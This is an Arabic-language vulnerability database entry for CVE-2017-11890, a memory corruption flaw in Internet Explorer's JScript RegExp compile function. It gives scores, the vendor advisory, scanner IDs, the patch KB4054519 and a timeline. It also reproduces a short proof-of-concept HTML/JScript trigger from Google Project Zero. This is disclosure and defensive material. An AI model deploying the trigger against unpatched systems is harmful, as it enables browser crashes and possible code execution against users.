Microsoft Internet Explorer 9/10/11 Scripting Engine Compile تلف الذاكرة

CVSS درجة الميتا الوقتيةسعر الإكسبلويت الحالي (≈)درجة اهتمام الـCTI
6.4$0-$5k0.00

تم أيجاد ثغرة أمنية بصنف خطيرة. في Microsoft Internet Explorer 9/10/11. الثغرة الأمنية متواجدة في الدالة jscript!RegExpComp::Compile من العنصر Scripting Engine. تعريف الـ سي دبليو أي للثغرة الأمنية هو CWE-119. المشكلة تم أكتشافها بتاريخ12/12/2017. المشكلة تمت مشاركتها بتاريخ 12/12/2017 بواسطة Ivan Fratric مع Google Project Zero كـ KB4054519 كـ Security Update Guide (Website). الاستشارة متوفرة هنا portal.msrc.microsoft.com.

أسم الثغرة الأمنية هوCVE-2017-11890. تمت إحالة الـ سي في أي31/07/2017. يمكن البدأ بالهجوم هذا عن بعد. التفاصيل التقنية متوفرة. التقارير تشير بأن الثغرة الأمنية هذه ذات شهرة أقل من المتوسط. هنالك إكسبلويت متوفرة. تم الإبلاغ عن ال إكسبلويت ويمكن استخدامها. سعر الثغرة الأمنية هذه بحوالي بـ USD $0-$5k في هذه اللحظة. وقد صرح الاستشاري بأن:

A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, the attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.

تم أعتبراها على أنها proof-of-concept. الإكسبلويت يمكن تحميلها من هناt exploit-db.com. لكونها ثغرة هجوم فوري متوسط سعرها كان$25k-$100k. الكود البرمجي المستخدم بواسطة الإكسبلويت هو:

<!-- saved from url=(0014)about:internet -->
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
</head>
<body>
<script language="Jscript.Encode">
 
var s = 'a';
for(var i=0;i<28;i++) {
  s = s+s;
}
s = s+'[a-z]'+s;
 
r = new RegExp();
r.compile(s);
 
</script>
</body>
</html>
برنامج فحص الشبكات نيسوس يوفر ملحق بعنوان105184(Windows 7 and Windows Server 2008 R2 December 2017 Security Updates), يمكنك من الكشف عن وجود هذه الثغرة. تصنيف عائلتها هوWindows : Microsoft Bulletins. الملحق يعمل بحسب الصنفl. خدمة فحص الشبكات كويلس يمكنها الكشف عن هذه الثغرة الأمنية بواسطة ملحق100325 (Microsoft Internet Explorer Security Update for December 2017).

أسم الباتش التصحيحي هوKB4054519. يمكن تحميل تصحيح المشكلة من هنا catalog.update.microsoft.com. ننصح بـ تنصيب باتش لإصلاح هذه المشكلة.

الثغرة الأمنية هذه تم تسجيلها في قواعد بيانات آخرى: SecurityFocus (BID 102082) , Tenable (105184).

منتجالمعلومات

النوع

المجهز

الأسم

النسخة

الرخصة

الدعم

  • end of life

CPE 2.3المعلومات

CPE 2.2المعلومات

CVSSv4المعلومات

VulDB CVSS-B Score: 🔍
VulDB CVSS-BT Score: 🔍
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

CVSSv3المعلومات

VulDB الدرجة الأساسية للميتا: 7.1
VulDB درجة الميتا الوقتية: 6.9

VulDB الدرجة الأساسية: 6.3
VulDB الدرجة الوقتية: 5.7
VulDB متجه: 🔍
VulDB الاعتمادية: 🔍

المجهز الدرجة الأساسية (Microsoft): 7.5
المجهز Vector (Microsoft): 🔍

NVD الدرجة الأساسية: 7.5
NVD متجه: 🔍

CVSSv2المعلومات

AVACAuCIA
💳💳💳💳💳💳
💳💳💳💳💳💳
💳💳💳💳💳💳
متجهالتعقيدتوثيقالسريةالأمانةالتوفر
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح
افتحافتحافتحافتحافتحافتح

VulDB الدرجة الأساسية: 🔍
VulDB الدرجة الوقتية: 🔍
VulDB الاعتمادية: 🔍

NVD الدرجة الأساسية: 🔍

إكسبلويتالمعلومات

الفئة: تلف الذاكرة
CWE: CWE-119
CAPEC: 🔍
ATT&CK: 🔍

محلي: لا
عن بعد: نعم

التوفر: 🔍
وصول: عام
الحالة: Proof-of-Concept
الكاتب: Google Security Research
تحميل: 🔍

EPSS Score: 🔍
EPSS Percentile: 🔍

تقدير السعر: 🔍
تقدير السعر الحالي: 🔍

0-Dayافتحافتحافتحافتح
اليومافتحافتحافتحافتح

Nessus ID: 105184
Nessus الأسم: Windows 7 and Windows Server 2008 R2 December 2017 Security Updates
Nessus ملف: 🔍
Nessus خطر: 🔍
Nessus عائلة: 🔍
Nessus Context: 🔍

OpenVAS ID: 863099
OpenVAS الأسم: Microsoft Internet Explorer Multiple Vulnerabilities (KB4052978)
OpenVAS ملف: 🔍
OpenVAS عائلة: 🔍

Qualys ID: 🔍
Qualys الأسم: 🔍

Exploit-DB: 🔍

استخبارات التهديدالمعلومات

الاهتمام: 🔍
الفاعلين النشيطين: 🔍
مجوعات الـAPT الفعالة: 🔍

إجراءات مضادةالمعلومات

المقترح: باتش
الحالة: 🔍

زمن الاستجابة: 🔍
زمن الهجوم الفوري: 🔍
زمن التعرض: 🔍
مدة تأخر الإكسبلويت: 🔍

باتش: KB4054519

التسلسل زمنيالمعلومات

31/07/2017 🔍
12/12/2017 +134 أيام 🔍
12/12/2017 +0 أيام 🔍
12/12/2017 +0 أيام 🔍
12/12/2017 +0 أيام 🔍
12/12/2017 +0 أيام 🔍
12/12/2017 +0 أيام 🔍
13/12/2017 +1 أيام 🔍
19/12/2017 +6 أيام 🔍
19/12/2017 +0 أيام 🔍
26/01/2021 +1134 أيام 🔍

المصادرالمعلومات

المجهز: microsoft.com

استشاري: KB4054519
باحث: Ivan Fratric
منظمة: Google Project Zero
الحالة: مؤكد
تأكيد: 🔍

CVE: CVE-2017-11890 (🔍)
OVAL: 🔍

SecurityTracker: 1039991
SecurityFocus: 102082 - Microsoft Internet Explorer CVE-2017-11890 Remote Memory Corruption Vulnerability

scip Labs: https://www.scip.ch/en/?labs.20161013

ادخالالمعلومات

تم الانشاء: 13/12/2017 07:48
تم التحديث: 26/01/2021 19:11
التغييرات: 13/12/2017 07:48 (101), 16/12/2019 10:54 (7), 26/01/2021 19:11 (2)
كامل: 🔍
Cache ID: 18:CF7:103

مناقشة

لا توجد تعليقات اللغات: ar + en.

يرجى تسجيل الدخول حتى تتمكن من التعليق

Interested in the pricing of exploits?

See the underground prices here!